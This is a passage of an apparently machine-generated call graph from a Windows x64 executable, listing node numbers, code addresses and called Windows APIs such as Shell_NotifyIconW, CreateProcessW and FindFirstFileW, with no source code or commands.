94207->94209 94208 7ff7ec1a240c 32 API calls 94208->94209 94209->94208 94210 7ff7ec1a29da 94209->94210 94211 7ff7ec1267d8 45 API calls 94209->94211 94210->93910 94210->93923 94211->94209 94213 7ff7ec1a1d71 94212->94213 94214 7ff7ec1a1d61 94212->94214 94216 7ff7ec1a1dbf 94213->94216 94217 7ff7ec1548e0 89 API calls 94213->94217 94224 7ff7ec1a1d7a 94213->94224 94215 7ff7ec1548e0 89 API calls 94214->94215 94215->94213 94239 7ff7ec1a2038 94216->94239 94219 7ff7ec1a1d9e 94217->94219 94219->94216 94221 7ff7ec1a1da7 94219->94221 94220 7ff7ec1a1df5 94222 7ff7ec1a1df9 94220->94222 94223 7ff7ec1a1e1c 94220->94223 94221->94224 94251 7ff7ec154970 94221->94251 94225 7ff7ec1a1e07 94222->94225 94227 7ff7ec154970 62 API calls 94222->94227 94229 7ff7ec1a1e4a 94223->94229 94230 7ff7ec1a1e2a 94223->94230 94224->93923 94225->94224 94228 7ff7ec154970 62 API calls 94225->94228 94227->94225 94228->94224 94243 7ff7ec1a1e88 94229->94243 94232 7ff7ec1a1e38 94230->94232 94233 7ff7ec154970 62 API calls 94230->94233 94232->94224 94234 7ff7ec154970 62 API calls 94232->94234 94233->94232 94234->94224 94235 7ff7ec1a1e52 94236 7ff7ec1a1e68 94235->94236 94237 7ff7ec154970 62 API calls 94235->94237 94236->94224 94238 7ff7ec154970 62 API calls 94236->94238 94237->94236 94238->94224 94240 7ff7ec1a2069 94239->94240 94242 7ff7ec1a2056 memcpy_s 94239->94242 94241 7ff7ec154c5c _fread_nolock 45 API calls 94240->94241 94241->94242 94242->94220 94244 7ff7ec1a1fb0 94243->94244 94250 7ff7ec1a1eaa 94243->94250 94246 7ff7ec1a1fd3 94244->94246 94265 7ff7ec152a04 60 API calls 2 library calls 94244->94265 94246->94235 94247 7ff7ec1a1bd0 45 API calls 94247->94250 94250->94244 94250->94246 94250->94247 94263 7ff7ec1a1c9c 45 API calls 94250->94263 94264 7ff7ec1a20cc 60 API calls 94250->94264 94252 7ff7ec15498e 94251->94252 94253 7ff7ec1549a3 94251->94253 94267 7ff7ec1555d4 15 API calls _set_fmode 94252->94267 94255 7ff7ec15499e 94253->94255 94266 7ff7ec14df54 EnterCriticalSection 94253->94266 94255->94224 94257 7ff7ec154993 94268 7ff7ec15b164 31 API calls _invalid_parameter_noinfo 94257->94268 94258 7ff7ec1549b9 94260 7ff7ec1548ec 60 API calls 94258->94260 94261 7ff7ec1549c2 94260->94261 94262 7ff7ec14df60 fflush LeaveCriticalSection 94261->94262 94262->94255 94263->94250 94264->94250 94265->94246 94267->94257 94268->94255 94270 7ff7ec168f90 wcsftime 94269->94270 94271 7ff7ec123ec4 GetLongPathNameW 94270->94271 94272 7ff7ec127cf4 4 API calls 94271->94272 94273 7ff7ec123eed 94272->94273 94274 7ff7ec124074 94273->94274 94275 7ff7ec129640 4 API calls 94274->94275 94276 7ff7ec12408e 94275->94276 94277 7ff7ec1256d4 5 API calls 94276->94277 94278 7ff7ec12409b 94277->94278 94279 7ff7ec1240a7 94278->94279 94282 7ff7ec16bada 94278->94282 94281 7ff7ec124680 4 API calls 94279->94281 94283 7ff7ec1240b5 94281->94283 94285 7ff7ec16bb0f 94282->94285 94321 7ff7ec141ad0 CompareStringW 94282->94321 94317 7ff7ec1240e8 94283->94317 94286 7ff7ec1240cb Concurrency::wait 94286->93790 94288 7ff7ec126460 105 API calls 94287->94288 94289 7ff7ec1263e5 94288->94289 94290 7ff7ec16c656 94289->94290 94291 7ff7ec126460 105 API calls 94289->94291 94292 7ff7ec1a2948 90 API calls 94290->94292 94293 7ff7ec126400 94291->94293 94294 7ff7ec16c66e 94292->94294 94293->94290 94295 7ff7ec126408 94293->94295 94296 7ff7ec16c672 94294->94296 94297 7ff7ec16c690 94294->94297 94299 7ff7ec16c67b 94295->94299 94300 7ff7ec126414 94295->94300 94301 7ff7ec12652c 63 API calls 94296->94301 94298 7ff7ec144c68 4 API calls 94297->94298 94316 7ff7ec16c6dd Concurrency::wait 94298->94316 94323 7ff7ec19c5c8 77 API calls wprintf 94299->94323 94322 7ff7ec12e774 143 API calls Concurrency::wait 94300->94322 94301->94299 94304 7ff7ec16c68a 94304->94297 94305 7ff7ec126438 94305->93783 94306 7ff7ec16c895 94307 7ff7ec12652c 63 API calls 94306->94307 94315 7ff7ec16c8a9 94307->94315 94312 7ff7ec12ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94312->94316 94315->94306 94329 7ff7ec1976d8 77 API calls 3 library calls 94315->94329 94316->94306 94316->94312 94316->94315 94324 7ff7ec197400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94316->94324 94325 7ff7ec19730c 39 API calls 94316->94325 94326 7ff7ec1a0210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94316->94326 94327 7ff7ec12b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94316->94327 94328 7ff7ec129940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94316->94328 94318 7ff7ec124107 94317->94318 94320 7ff7ec124130 memcpy_s 94317->94320 94319 7ff7ec144c68 4 API calls 94318->94319 94319->94320 94320->94286 94321->94282 94322->94305 94323->94304 94324->94316 94325->94316 94326->94316 94327->94316 94328->94316 94329->94315 94331 7ff7ec129762 94330->94331 94332 7ff7ec12988d 94330->94332 94331->94332 94333 7ff7ec144c68 4 API calls 94331->94333 94332->93795 94334 7ff7ec129791 94333->94334 94335 7ff7ec144c68 4 API calls 94334->94335 94336 7ff7ec12981c 94335->94336 94336->94332 94342 7ff7ec12abe0 81 API calls 2 library calls 94336->94342 94343 7ff7ec129940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94336->94343 94344 7ff7ec12b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94336->94344 94340->93797 94341->93799 94342->94336 94343->94336 94344->94336 94345->93810 94346 7ff7ec132c17 94349 7ff7ec1314a0 94346->94349 94348 7ff7ec132c2a 94350 7ff7ec1314d3 94349->94350 94351 7ff7ec17be31 94350->94351 94354 7ff7ec17bdf2 94350->94354 94355 7ff7ec17bdd1 94350->94355 94381 7ff7ec1314fa __scrt_fastfail 94350->94381 94418 7ff7ec1b8f48 300 API calls 3 library calls 94351->94418 94356 7ff7ec17be19 94354->94356 94416 7ff7ec1b9a88 300 API calls 4 library calls 94354->94416 94357 7ff7ec17bddb 94355->94357 94355->94381 94417 7ff7ec1a34e4 77 API calls 3 library calls 94356->94417 94415 7ff7ec1b9514 300 API calls 94357->94415 94360 7ff7ec131884 94406 7ff7ec142130 45 API calls 94360->94406 94365 7ff7ec131898 94365->94348 94366 7ff7ec131a30 45 API calls 94366->94381 94373 7ff7ec142130 45 API calls 94373->94381 94374 7ff7ec17bfe4 94421 7ff7ec1b93a4 77 API calls 94374->94421 94375 7ff7ec131799 94383 7ff7ec131815 94375->94383 94422 7ff7ec1a34e4 77 API calls 3 library calls 94375->94422 94379 7ff7ec12e0a8 4 API calls 94379->94381 94381->94360 94381->94366 94381->94373 94381->94374 94381->94375 94381->94379 94381->94383 94384 7ff7ec133c20 94381->94384 94405 7ff7ec12ef9c 46 API calls 94381->94405 94407 7ff7ec1420d0 45 API calls 94381->94407 94408 7ff7ec125af8 300 API calls 94381->94408 94409 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94381->94409 94410 7ff7ec1435c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94381->94410 94411 7ff7ec144f0c 34 API calls _onexit 94381->94411 94412 7ff7ec1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94381->94412 94413 7ff7ec1436c4 77 API calls 94381->94413 94414 7ff7ec1437dc 300 API calls 94381->94414 94419 7ff7ec12ee20 5 API calls Concurrency::wait 94381->94419 94420 7ff7ec18ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94381->94420 94383->94348 94401 7ff7ec133c80 94384->94401 94385 7ff7ec1805be 94425 7ff7ec1a34e4 77 API calls 3 library calls 94385->94425 94388 7ff7ec134aa9 94390 7ff7ec134ac0 94388->94390 94393 7ff7ec12e0a8 4 API calls 94388->94393 94389 7ff7ec1805d1 94389->94381 94390->94381 94391 7ff7ec134fe7 94395 7ff7ec12e0a8 4 API calls 94391->94395 94392 7ff7ec133dde 94392->94381 94393->94392 94394 7ff7ec17fefe 94398 7ff7ec12e0a8 4 API calls 94394->94398 94395->94392 94396 7ff7ec12e0a8 4 API calls 94396->94401 94397 7ff7ec134a8f 94397->94388 94397->94390 94397->94394 94398->94390 94400 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94400->94401 94401->94385 94401->94388 94401->94391 94401->94392 94401->94396 94401->94397 94401->94400 94402 7ff7ec129640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94401->94402 94403 7ff7ec1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94401->94403 94404 7ff7ec144f0c 34 API calls __scrt_initialize_thread_safe_statics 94401->94404 94423 7ff7ec135360 300 API calls Concurrency::wait 94401->94423 94424 7ff7ec1a34e4 77 API calls 3 library calls 94401->94424 94402->94401 94403->94401 94404->94401 94405->94381 94406->94365 94407->94381 94408->94381 94410->94381 94411->94381 94413->94381 94414->94381 94415->94383 94416->94356 94417->94351 94418->94381 94419->94381 94420->94381 94421->94375 94422->94375 94423->94401 94424->94401 94425->94389 94426 7ff7ec132bf8 94429 7ff7ec12ed44 94426->94429 94428 7ff7ec132c05 94430 7ff7ec12ed75 94429->94430 94437 7ff7ec12edcd 94429->94437 94431 7ff7ec133c20 300 API calls 94430->94431 94430->94437 94433 7ff7ec12eda8 94431->94433 94435 7ff7ec12edfe 94433->94435 94438 7ff7ec12ee20 5 API calls Concurrency::wait 94433->94438 94434 7ff7ec17a636 94435->94428 94437->94435 94439 7ff7ec1a34e4 77 API calls 3 library calls 94437->94439 94438->94437 94439->94434 94440 7ff7ec125dec 94441 7ff7ec125df4 94440->94441 94442 7ff7ec125e98 94441->94442 94443 7ff7ec125e28 94441->94443 94465 7ff7ec125e96 94441->94465 94444 7ff7ec16c229 94442->94444 94445 7ff7ec125e9e 94442->94445 94446 7ff7ec125f21 PostQuitMessage 94443->94446 94447 7ff7ec125e35 94443->94447 94496 7ff7ec13ede4 8 API calls 94444->94496 94449 7ff7ec125ecc SetTimer RegisterWindowMessageW 94445->94449 94450 7ff7ec125ea5 94445->94450 94454 7ff7ec125e7c 94446->94454 94451 7ff7ec125e40 94447->94451 94452 7ff7ec16c2af 94447->94452 94448 7ff7ec125e6b DefWindowProcW 94448->94454 94449->94454 94457 7ff7ec125efc CreatePopupMenu 94449->94457 94455 7ff7ec125eae KillTimer 94450->94455 94456 7ff7ec16c1b8 94450->94456 94458 7ff7ec125e49 94451->94458 94459 7ff7ec125f2b 94451->94459 94508 7ff7ec19a40c 16 API calls __scrt_fastfail 94452->94508 94482 7ff7ec125d88 94455->94482 94462 7ff7ec16c1bd 94456->94462 94463 7ff7ec16c1f7 MoveWindow 94456->94463 94457->94454 94458->94465 94472 7ff7ec125f0b 94458->94472 94473 7ff7ec125e5f 94458->94473 94486 7ff7ec144610 94459->94486 94461 7ff7ec16c255 94497 7ff7ec142c44 47 API calls Concurrency::wait 94461->94497 94469 7ff7ec16c1e4 SetFocus 94462->94469 94470 7ff7ec16c1c2 94462->94470 94463->94454 94465->94448 94466 7ff7ec16c2c3 94466->94448 94466->94454 94469->94454 94470->94473 94474 7ff7ec16c1cb 94470->94474 94494 7ff7ec125f3c 26 API calls __scrt_fastfail 94472->94494 94473->94448 94479 7ff7ec125d88 Shell_NotifyIconW 94473->94479 94495 7ff7ec13ede4 8 API calls 94474->94495 94478 7ff7ec125f1f 94478->94454 94480 7ff7ec16c280 94479->94480 94498 7ff7ec126258 94480->94498 94483 7ff7ec125d99 __scrt_fastfail 94482->94483 94484 7ff7ec125de4 94482->94484 94485 7ff7ec125db8 Shell_NotifyIconW 94483->94485 94493 7ff7ec127098 DeleteObject DestroyWindow Concurrency::wait 94484->94493 94485->94484 94487 7ff7ec14461a __scrt_fastfail 94486->94487 94488 7ff7ec1446db 94486->94488 94509 7ff7ec1272c8 94487->94509 94488->94454 94490 7ff7ec144660 94491 7ff7ec1446a2 KillTimer SetTimer 94490->94491 94492 7ff7ec18aaa1 Shell_NotifyIconW 94490->94492 94491->94488 94492->94491 94493->94454 94494->94478 94495->94454 94496->94461 94497->94473 94499 7ff7ec126287 __scrt_fastfail 94498->94499 94536 7ff7ec1261c4 94499->94536 94502 7ff7ec12632d 94504 7ff7ec12634e Shell_NotifyIconW 94502->94504 94505 7ff7ec16c644 Shell_NotifyIconW 94502->94505 94506 7ff7ec1272c8 6 API calls 94504->94506 94507 7ff7ec126365 94506->94507 94507->94465 94508->94466 94510 7ff7ec1272f4 94509->94510 94529 7ff7ec1273bc Concurrency::wait 94509->94529 94531 7ff7ec1298e8 94510->94531 94512 7ff7ec127303 94513 7ff7ec16cdfc LoadStringW 94512->94513 94514 7ff7ec127310 94512->94514 94516 7ff7ec16ce1e 94513->94516 94515 7ff7ec127cf4 4 API calls 94514->94515 94517 7ff7ec127324 94515->94517 94518 7ff7ec12e0a8 4 API calls 94516->94518 94519 7ff7ec127336 94517->94519 94520 7ff7ec16ce30 94517->94520 94526 7ff7ec12734f __scrt_fastfail wcscpy 94518->94526 94519->94516 94521 7ff7ec127343 94519->94521 94535 7ff7ec127c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94520->94535 94534 7ff7ec127c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94521->94534 94524 7ff7ec16ce3c 94525 7ff7ec1271f8 4 API calls 94524->94525 94524->94526 94527 7ff7ec16ce63 94525->94527 94528 7ff7ec1273a3 Shell_NotifyIconW 94526->94528 94530 7ff7ec1271f8 4 API calls 94527->94530 94528->94529 94529->94490 94530->94526 94532 7ff7ec144c68 4 API calls 94531->94532 94533 7ff7ec129918 94532->94533 94533->94512 94534->94526 94535->94524 94537 7ff7ec16c5f8 94536->94537 94538 7ff7ec1261e0 94536->94538 94537->94538 94539 7ff7ec16c602 DestroyIcon 94537->94539 94538->94502 94540 7ff7ec19ad94 39 API calls wcsftime 94538->94540 94539->94538 94540->94502 94541 7ff7ec1347e1 94542 7ff7ec134d57 94541->94542 94546 7ff7ec1347f2 94541->94546 94606 7ff7ec12ee20 5 API calls Concurrency::wait 94542->94606 94543 7ff7ec134d66 94607 7ff7ec12ee20 5 API calls Concurrency::wait 94543->94607 94546->94543 94547 7ff7ec134862 94546->94547 94548 7ff7ec134df3 94546->94548 94563 7ff7ec133c80 94547->94563 94571 7ff7ec1366c0 94547->94571 94608 7ff7ec1a0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94548->94608 94551 7ff7ec1805be 94610 7ff7ec1a34e4 77 API calls 3 library calls 94551->94610 94553 7ff7ec134a8f 94555 7ff7ec134aa9 94553->94555 94557 7ff7ec134ac0 94553->94557 94562 7ff7ec17fefe 94553->94562 94555->94557 94560 7ff7ec12e0a8 4 API calls 94555->94560 94556 7ff7ec1805d1 94558 7ff7ec144f0c 34 API calls __scrt_initialize_thread_safe_statics 94558->94563 94559 7ff7ec134fe7 94564 7ff7ec12e0a8 4 API calls 94559->94564 94561 7ff7ec133dde 94560->94561 94566 7ff7ec12e0a8 4 API calls 94562->94566 94563->94551 94563->94553 94563->94555 94563->94558 94563->94559 94563->94561 94565 7ff7ec12e0a8 4 API calls 94563->94565 94568 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94563->94568 94569 7ff7ec129640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94563->94569 94570 7ff7ec1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94563->94570 94605 7ff7ec135360 300 API calls Concurrency::wait 94563->94605 94609 7ff7ec1a34e4 77 API calls 3 library calls 94563->94609 94564->94561 94565->94563 94566->94557 94568->94563 94569->94563 94570->94563 94596 7ff7ec13673b memcpy_s Concurrency::wait 94571->94596 94573 7ff7ec181fac 94735 7ff7ec1bab30 300 API calls Concurrency::wait 94573->94735 94575 7ff7ec181fbe 94575->94563 94576 7ff7ec136d40 9 API calls 94576->94596 94577 7ff7ec12ec00 4 API calls 94577->94596 94578 7ff7ec136c0f 94579 7ff7ec181fc9 94578->94579 94580 7ff7ec136c3d 94578->94580 94736 7ff7ec1a34e4 77 API calls 3 library calls 94579->94736 94732 7ff7ec12ee20 5 API calls Concurrency::wait 94580->94732 94584 7ff7ec136c4a 94733 7ff7ec141fcc 300 API calls 94584->94733 94587 7ff7ec144c68 4 API calls 94587->94596 94588 7ff7ec1820c1 94597 7ff7ec136b15 94588->94597 94739 7ff7ec1a34e4 77 API calls 3 library calls 94588->94739 94589 7ff7ec136c78 94734 7ff7ec13e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94589->94734 94592 7ff7ec133c20 300 API calls 94592->94596 94593 7ff7ec182032 94737 7ff7ec1a34e4 77 API calls 3 library calls 94593->94737 94595 7ff7ec12e0a8 4 API calls 94595->94596 94596->94573 94596->94576 94596->94577 94596->94578 94596->94579 94596->94584 94596->94587 94596->94588 94596->94589 94596->94592 94596->94593 94596->94595 94596->94597 94611 7ff7ec1bf160 94596->94611 94616 7ff7ec1a5b80 94596->94616 94622 7ff7ec1a63dc 94596->94622 94627 7ff7ec1a8e98 94596->94627 94660 7ff7ec1bf0ac 94596->94660 94663 7ff7ec1a7e48 94596->94663 94697 7ff7ec1a8ea0 94596->94697 94730 7ff7ec145114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94596->94730 94731 7ff7ec1450b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94596->94731 94738 7ff7ec1b8d98 49 API calls Concurrency::wait 94596->94738 94597->94563 94605->94563 94606->94543 94607->94548 94608->94563 94609->94563 94610->94556 94740 7ff7ec1bf630 94611->94740 94613 7ff7ec1bf1cd 94613->94596 94614 7ff7ec1bf182 94614->94613 94808 7ff7ec12ee20 5 API calls Concurrency::wait 94614->94808 94617 7ff7ec1a5ba5 94616->94617 94618 7ff7ec1a5ba9 94617->94618 94619 7ff7ec1a5be5 FindClose 94617->94619 94620 7ff7ec1a5bd5 94617->94620 94618->94596 94619->94618 94620->94618 94860 7ff7ec127ab8 94620->94860 94623 7ff7ec12d4cc 48 API calls 94622->94623 94624 7ff7ec1a63f8 94623->94624 94871 7ff7ec19bdec 94624->94871 94626 7ff7ec1a6404 94626->94596 94628 7ff7ec1aa680 94627->94628 94636 7ff7ec1aa71a 94628->94636 94897 7ff7ec12834c 94628->94897 94631 7ff7ec1aa7fd 94922 7ff7ec1a1864 6 API calls 94631->94922 94632 7ff7ec12d4cc 48 API calls 94633 7ff7ec1aa6d0 94632->94633 94906 7ff7ec126838 94633->94906 94635 7ff7ec1aa6f3 94635->94596 94636->94631 94636->94635 94640 7ff7ec1aa770 94636->94640 94638 7ff7ec1aa805 94923 7ff7ec19b334 94638->94923 94642 7ff7ec12d4cc 48 API calls 94640->94642 94641 7ff7ec1aa6e6 94641->94635 94645 7ff7ec127ab8 CloseHandle 94641->94645 94648 7ff7ec1aa778 94642->94648 94644 7ff7ec1aa7ee 94879 7ff7ec19b3a8 94644->94879 94645->94635 94646 7ff7ec1aa7a7 94649 7ff7ec1298e8 4 API calls 94646->94649 94648->94644 94648->94646 94651 7ff7ec1aa7b5 94649->94651 94650 7ff7ec128314 CloseHandle 94652 7ff7ec1aa85c 94650->94652 94653 7ff7ec12e0a8 4 API calls 94651->94653 94652->94635 94655 7ff7ec127ab8 CloseHandle 94652->94655 94654 7ff7ec1aa7c2 94653->94654 94656 7ff7ec1271f8 4 API calls 94654->94656 94655->94635 94657 7ff7ec1aa7d3 94656->94657 94658 7ff7ec19b3a8 12 API calls 94657->94658 94659 7ff7ec1aa7e0 Concurrency::wait 94658->94659 94659->94635 94659->94650 94661 7ff7ec1bf630 164 API calls 94660->94661 94662 7ff7ec1bf0c2 94661->94662 94662->94596 94664 7ff7ec1a7e79 94663->94664 94665 7ff7ec129640 4 API calls 94664->94665 94694 7ff7ec1a7f55 Concurrency::wait 94664->94694 94666 7ff7ec1a7ea6 94665->94666 94668 7ff7ec129640 4 API calls 94666->94668 94667 7ff7ec12834c 5 API calls 94669 7ff7ec1a7f99 94667->94669 94670 7ff7ec1a7eaf 94668->94670 94671 7ff7ec12d4cc 48 API calls 94669->94671 94672 7ff7ec12d4cc 48 API calls 94670->94672 94673 7ff7ec1a7fab 94671->94673 94674 7ff7ec1a7ebe 94672->94674 94675 7ff7ec126838 16 API calls 94673->94675 94942 7ff7ec1274ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94674->94942 94676 7ff7ec1a7fba 94675->94676 94678 7ff7ec1a7fbe GetLastError 94676->94678 94683 7ff7ec1a7ff5 94676->94683 94680 7ff7ec1a7fd8 94678->94680 94679 7ff7ec1a7ed8 94943 7ff7ec127c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94679->94943 94686 7ff7ec127ab8 CloseHandle 94680->94686 94690 7ff7ec1a7fe5 94680->94690 94682 7ff7ec1a7f07 94682->94694 94944 7ff7ec19bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 94682->94944 94684 7ff7ec129640 4 API calls 94683->94684 94687 7ff7ec1a8035 94684->94687 94686->94690 94687->94690 94946 7ff7ec190d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94687->94946 94688 7ff7ec1a7f17 94689 7ff7ec1a7f1b 94688->94689 94688->94694 94692 7ff7ec12ec00 4 API calls 94689->94692 94690->94596 94693 7ff7ec1a7f28 94692->94693 94945 7ff7ec19bab8 8 API calls Concurrency::wait 94693->94945 94694->94667 94694->94690 94696 7ff7ec1a7f31 Concurrency::wait 94696->94694 94698 7ff7ec1aa680 94697->94698 94700 7ff7ec12834c 5 API calls 94698->94700 94706 7ff7ec1aa71a 94698->94706 94699 7ff7ec1aa6f3 94699->94596 94701 7ff7ec1aa6be 94700->94701 94703 7ff7ec12d4cc 48 API calls 94701->94703 94702 7ff7ec1aa7fd 94947 7ff7ec1a1864 6 API calls 94702->94947 94704 7ff7ec1aa6d0 94703->94704 94707 7ff7ec126838 16 API calls 94704->94707 94706->94699 94706->94702 94709 7ff7ec1aa770 94706->94709 94708 7ff7ec1aa6e2 94707->94708 94708->94706 94710 7ff7ec1aa6e6 94708->94710 94712 7ff7ec12d4cc 48 API calls 94709->94712 94710->94699 94715 7ff7ec127ab8 CloseHandle 94710->94715 94711 7ff7ec1aa805 94713 7ff7ec19b334 4 API calls 94711->94713 94718 7ff7ec1aa778 94712->94718 94729 7ff7ec1aa7e0 Concurrency::wait 94713->94729 94714 7ff7ec1aa7ee 94717 7ff7ec19b3a8 12 API calls 94714->94717 94715->94699 94716 7ff7ec1aa7a7 94719 7ff7ec1298e8 4 API calls 94716->94719 94717->94729 94718->94714 94718->94716 94721 7ff7ec1aa7b5 94719->94721 94720 7ff7ec128314 CloseHandle 94722 7ff7ec1aa85c 94720->94722 94723 7ff7ec12e0a8 4 API calls 94721->94723 94722->94699 94725 7ff7ec127ab8 CloseHandle 94722->94725 94724 7ff7ec1aa7c2 94723->94724 94726 7ff7ec1271f8 4 API calls 94724->94726 94725->94699 94727 7ff7ec1aa7d3 94726->94727 94728 7ff7ec19b3a8 12 API calls 94727->94728 94728->94729 94729->94699 94729->94720 94732->94584 94733->94589 94734->94589 94735->94575 94736->94597 94737->94597 94738->94596 94739->94597 94741 7ff7ec1bf671 __scrt_fastfail 94740->94741 94809 7ff7ec12d4cc 94741->94809 94745 7ff7ec1bf759 94746 7ff7ec1bf762 94745->94746 94747 7ff7ec1bf840 94745->94747 94749 7ff7ec12d4cc 48 API calls 94746->94749 94748 7ff7ec1bf87d GetCurrentDirectoryW 94747->94748 94750 7ff7ec12d4cc 48 API calls 94747->94750 94751 7ff7ec144c68 4 API calls 94748->94751 94752 7ff7ec1bf777 94749->94752 94753 7ff7ec1bf85c 94750->94753 94754 7ff7ec1bf8a7 GetCurrentDirectoryW 94751->94754 94755 7ff7ec12e330 4 API calls 94752->94755 94756 7ff7ec12e330 4 API calls 94753->94756 94757 7ff7ec1bf8b5 94754->94757 94758 7ff7ec1bf783 94755->94758 94759 7ff7ec1bf868 94756->94759 94760 7ff7ec1bf8f0 94757->94760 94841 7ff7ec13f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94757->94841 94761 7ff7ec12d4cc 48 API calls 94758->94761 94759->94748 94759->94760 94766 7ff7ec1bf901 94760->94766 94767 7ff7ec1bf905 94760->94767 94763 7ff7ec1bf798 94761->94763 94765 7ff7ec12e330 4 API calls 94763->94765 94764 7ff7ec1bf8d0 94842 7ff7ec13f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94764->94842 94769 7ff7ec1bf7a4 94765->94769 94776 7ff7ec1bf972 94766->94776 94777 7ff7ec1bfa0f CreateProcessW 94766->94777 94844 7ff7ec19fddc 8 API calls 94767->94844 94771 7ff7ec12d4cc 48 API calls 94769->94771 94770 7ff7ec1bf8e0 94843 7ff7ec13f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94770->94843 94774 7ff7ec1bf7b9 94771->94774 94779 7ff7ec12e330 4 API calls 94774->94779 94775 7ff7ec1bf90e 94845 7ff7ec19fca8 8 API calls 94775->94845 94847 7ff7ec18d1f8 99 API calls 94776->94847 94787 7ff7ec1bf9b4 94777->94787 94781 7ff7ec1bf7c5 94779->94781 94783 7ff7ec1bf806 GetSystemDirectoryW 94781->94783 94785 7ff7ec12d4cc 48 API calls 94781->94785 94782 7ff7ec1bf926 94846 7ff7ec19fafc 8 API calls ~SyncLockT 94782->94846 94786 7ff7ec144c68 4 API calls 94783->94786 94788 7ff7ec1bf7e1 94785->94788 94790 7ff7ec1bf830 GetSystemDirectoryW 94786->94790 94791 7ff7ec1bfabe CloseHandle 94787->94791 94799 7ff7ec1bfa64 94787->94799 94792 7ff7ec12e330 4 API calls 94788->94792 94789 7ff7ec1bf94f 94789->94766 94790->94757 94794 7ff7ec1bfaf5 94791->94794 94795 7ff7ec1bfacc 94791->94795 94793 7ff7ec1bf7ed 94792->94793 94793->94757 94793->94783 94796 7ff7ec1bfafe 94794->94796 94801 7ff7ec1bfb26 CloseHandle 94794->94801 94848 7ff7ec19f7dc 94795->94848 94805 7ff7ec1bfaa3 94796->94805 94802 7ff7ec1bfa84 GetLastError 94799->94802 94801->94805 94802->94805 94832 7ff7ec19f51c 94805->94832 94808->94613 94810 7ff7ec12d50b 94809->94810 94822 7ff7ec12d4f2 94809->94822 94811 7ff7ec12d53e 94810->94811 94812 7ff7ec12d513 94810->94812 94814 7ff7ec12d550 94811->94814 94821 7ff7ec179cc4 94811->94821 94823 7ff7ec179bbc 94811->94823 94853 7ff7ec14956c 31 API calls 94812->94853 94854 7ff7ec144834 46 API calls 94814->94854 94816 7ff7ec12d522 94820 7ff7ec12ec00 4 API calls 94816->94820 94818 7ff7ec179cdc 94820->94822 94856 7ff7ec149538 31 API calls 94821->94856 94828 7ff7ec12e330 94822->94828 94824 7ff7ec144c68 4 API calls 94823->94824 94827 7ff7ec179c3e Concurrency::wait wcscpy 94823->94827 94825 7ff7ec179c0a 94824->94825 94826 7ff7ec12ec00 4 API calls 94825->94826 94826->94827 94855 7ff7ec144834 46 API calls 94827->94855 94829 7ff7ec12e342 94828->94829 94830 7ff7ec144c68 4 API calls 94829->94830 94831 7ff7ec12e361 wcscpy 94830->94831 94831->94745 94833 7ff7ec19f7dc CloseHandle 94832->94833 94834 7ff7ec19f52a 94833->94834 94857 7ff7ec19f7b8 94834->94857 94837 7ff7ec19f7b8 ~SyncLockT CloseHandle 94838 7ff7ec19f53c 94837->94838 94839 7ff7ec19f7b8 ~SyncLockT CloseHandle 94838->94839 94840 7ff7ec19f545 94839->94840 94840->94614 94841->94764 94842->94770 94843->94760 94844->94775 94845->94782 94846->94789 94847->94787 94849 7ff7ec19f7b8 ~SyncLockT CloseHandle 94848->94849 94850 7ff7ec19f7ee 94849->94850 94851 7ff7ec19f7b8 ~SyncLockT CloseHandle 94850->94851 94852 7ff7ec19f7f7 94851->94852 94853->94816 94854->94816 94855->94821 94856->94818 94858 7ff7ec19f533 94857->94858 94859 7ff7ec19f7c9 CloseHandle 94857->94859 94858->94837 94859->94858 94863 7ff7ec1282e4 94860->94863 94868 7ff7ec128314 94863->94868 94865 7ff7ec1282f2 Concurrency::wait 94866 7ff7ec128314 CloseHandle 94865->94866 94867 7ff7ec128303 94866->94867 94869 7ff7ec12832a 94868->94869 94870 7ff7ec12833d CloseHandle 94868->94870 94869->94865 94870->94869 94874 7ff7ec19c7c0 lstrlenW 94871->94874 94875 7ff7ec19c7dd GetFileAttributesW 94874->94875 94876 7ff7ec19bdf5 94874->94876 94875->94876 94877 7ff7ec19c7eb FindFirstFileW 94875->94877 94876->94626 94877->94876 94878 7ff7ec19c7ff FindClose 94877->94878 94878->94876 94880 7ff7ec19b3c8 94879->94880 94881 7ff7ec19b42a 